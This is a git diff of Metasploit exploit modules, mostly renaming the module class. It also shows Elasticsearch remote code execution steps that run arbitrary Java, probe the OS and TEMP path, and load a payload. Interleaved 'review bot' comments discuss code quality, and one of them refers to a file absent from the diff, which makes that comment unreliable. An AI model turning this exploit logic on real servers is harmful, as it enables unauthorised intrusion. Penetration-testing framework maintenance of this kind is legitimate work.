a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 3a33e74fb0..8ef37218b9 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb 
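Review bot: In `exploit` of the new exagrid_known_privkey.rb, `login_data` is built with `last_attempted: Time.now` and no `status:` key before it goes to `create_credential_login`. That helper's definition is not in this diff, so please confirm, but if it expects `last_attempted_at` and a `status`, the login record is either rejected or stored without its timestamp, and an exception there would end `exploit` before the lines after it run. I would write `last_attempted_at: Time.now,` and `status: Metasploit::Model::Login::Status::SUCCESSFUL,`. In `do_login`, `rescue Net::SSH::AuthenticationFailed` is the only branch without `return`, so a failed authentication falls through to the trailing `else` and yields `false` while every other failure yields `nil`; adding `return` makes the failure paths uniform. `register_advanced_options` also omits the `self.class` argument that `register_options` passes a few lines above it.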
+++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3a68d2f957..7693de503a 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 83e5191308..e92c624a4f 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 4885234c97..5f107ea05f 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 1665ae8b2d..a5f7d68121 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb 
@@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb index d65f048c33..d806264e2c 100644 --- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb +++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index fe94b76a68..77161f34cc 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb index 445567be76..4bdb568455 100644 --- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb index dcb5f9346a..c3145edd6a 100644 --- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index 1a6ef9ca70..4a3fc784c6 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb index bb4886ba44..78d47028e5 100644 --- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb index f79bc97fd5..3fefc1f43a 100644 --- a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb index 68a671f847..9e3a04a118 100644 
--- a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb index 8c833f900e..c5f779aac6 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index b040cd0391..385b64db3e 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 55f244cdda..a3c709311a 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # 
diff --git a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb index 7cf0100b51..0cae78da7e 100644 --- a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb +++ b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 253f4b1b31..a8697b93ed 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proxy_prototype.rb b/modules/exploits/multi/browser/firefox_proxy_prototype.rb index 8da445326f..ff0aa8649d 100644 --- a/modules/exploits/multi/browser/firefox_proxy_prototype.rb +++ b/modules/exploits/multi/browser/firefox_proxy_prototype.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 4511da4250..a78533c60a 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # 
diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb index 6bfa1dc147..568c9ed1de 100644 --- a/modules/exploits/multi/browser/firefox_svg_plugin.rb +++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb index ad5eda286d..cee613df0d 100644 --- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb +++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_webidl_injection.rb b/modules/exploits/multi/browser/firefox_webidl_injection.rb index 194c1920ba..75d0e62887 100644 --- a/modules/exploits/multi/browser/firefox_webidl_injection.rb +++ b/modules/exploits/multi/browser/firefox_webidl_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index f76342cdbf..5bef4ac4e8 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 9fe7bb5ea4..9faaab409d 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index aedfed2fd1..2efbc2544a 100644 --- a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index 3942291ee4..7d91e8b864 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 3a123768f2..5f9427aae4 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_jre17_driver_manager.rb b/modules/exploits/multi/browser/java_jre17_driver_manager.rb index b832f9ea9b..8c68bb3eeb 100644 --- a/modules/exploits/multi/browser/java_jre17_driver_manager.rb +++ b/modules/exploits/multi/browser/java_jre17_driver_manager.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_exec.rb b/modules/exploits/multi/browser/java_jre17_exec.rb index 9280d870ad..b3a797e075 100644 --- a/modules/exploits/multi/browser/java_jre17_exec.rb +++ b/modules/exploits/multi/browser/java_jre17_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 7c37c553a2..e0545f2e52 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jaxws.rb b/modules/exploits/multi/browser/java_jre17_jaxws.rb index 4dfad212b6..5333aced38 100644 --- a/modules/exploits/multi/browser/java_jre17_jaxws.rb +++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb index 597c3fdf2f..ce12144e5f 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 906d07867f..1902a0eb83 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 32f55c5613..1bbea0f9c8 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index 9e4931f342..32da73a192 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb 
+++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index 9fa97d5e57..b3852a2629 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rhino.rb b/modules/exploits/multi/browser/java_rhino.rb index c752549994..5577bb5818 100644 --- a/modules/exploits/multi/browser/java_rhino.rb +++ b/modules/exploits/multi/browser/java_rhino.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index 41a3705785..5ae6062ed0 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 46be8c7c58..290c212685 100644 
--- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 82bc228e50..5ebe7bd273 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index cab28b512a..68fb323109 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index e2f4651f3e..fb54d99100 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index dbe08a3035..644ecbf818 100644 
--- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index b01bba4436..a0781321ae 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index bf763ea14d..e2b148f5c9 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -6,7 +6,7 @@ require 'msf/core/constants' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 0e426d005b..74045adbdd 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index 470e2f1eb5..e04ac98519 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 5a1e3c5e1b..e23c60c516 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index d6fb488e75..726953c360 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -65,30 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to execute arbitrary Java...") + print_status("Trying to execute arbitrary Java...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else # TODO: It'd be nice to report_host() with this info. - print_good("#{peer} - Remote OS is '#{result}'") + print_good("Remote OS is '#{result}'") end jar_file = "" if result =~ /win/i - print_status("#{peer} - Discovering TEMP path") + print_status("Discovering TEMP path") res = execute(java_tmp_dir) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path identified: '#{result}'") + print_good("TEMP path identified: '#{result}'") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else @@ -102,18 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'System.getProperty("java.class.path")' - vprint_status("#{peer} - Trying to execute 'System.getProperty(\"java.version\")'...") + vprint_status("Trying to execute 'System.getProperty(\"java.version\")'...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - No results for the Java test") + vprint_status("No results for the Java test") return false elsif result =~ /elasticsearch/ - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return true else - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return false end end 
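Review bot: The verbose message in `vulnerable?` (second hunk, script_mvel_rce.rb) reports `System.getProperty("java.version")`, but the expression actually sent is the `java` local set on the line above, `System.getProperty("java.class.path")`. The log therefore misreports the probe, which is confusing when an operator or defender correlates console output with server-side request logs. Interpolating the variable keeps the two in sync: `vprint_status("Trying to execute '#{java}'...")`. The mismatch predates this commit, which only dropped the `#{peer} - ` prefix from that line.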
diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index a513909f8a..68a45dd24f 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -63,27 +63,27 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking vulnerability...") + print_status("Checking vulnerability...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering TEMP path...") + print_status("Discovering TEMP path...") res = execute(java_tmp_dir) tmp_dir = parse_result(res) if tmp_dir.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path on '#{tmp_dir}'") + print_good("TEMP path on '#{tmp_dir}'") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) os = parse_result(res) if os.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else - print_good("#{peer} - Remote OS is '#{os}'") + print_good("Remote OS is '#{os}'") end if os =~ /win/i @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(tmp_file) - print_status("#{peer} - Trying to load metasploit payload...") + print_status("Trying to load metasploit payload...") java = java_load_class(os, tmp_file) execute(java) end 
